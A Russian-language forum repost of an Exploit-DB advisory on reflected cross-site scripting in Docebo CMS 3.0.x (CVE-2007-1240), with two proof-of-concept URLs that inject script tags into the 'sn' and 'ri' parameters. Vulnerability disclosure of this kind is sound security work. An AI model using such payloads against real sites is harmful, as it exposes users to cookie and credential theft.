Exploit Docebo CMS 3.0.x - '/modules/htmlframechat/index.php' Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29662
Проверка EDB
  1. Пройдено
Автор
R00T
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1240
Дата публикации
2007-02-24
Docebo CMS 3.0.x - '/modules/htmlframechat/index.php' Multiple Cross-Site Scripting Vulnerabilities
Код:
Docebo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 
Docebo 3.0.5 and prior versions are vulnerable; other versions may also be affected. 

http://www.example.com/doceboScs/modules/htmlframechat/index.php?sn=<script>alert('XSS');</script> http://www.example.com/doceboScs/modules/htmlframechat/index.php?ri=<script>alert('XSS');</script>
 
Источник
www.exploit-db.com

Похожие темы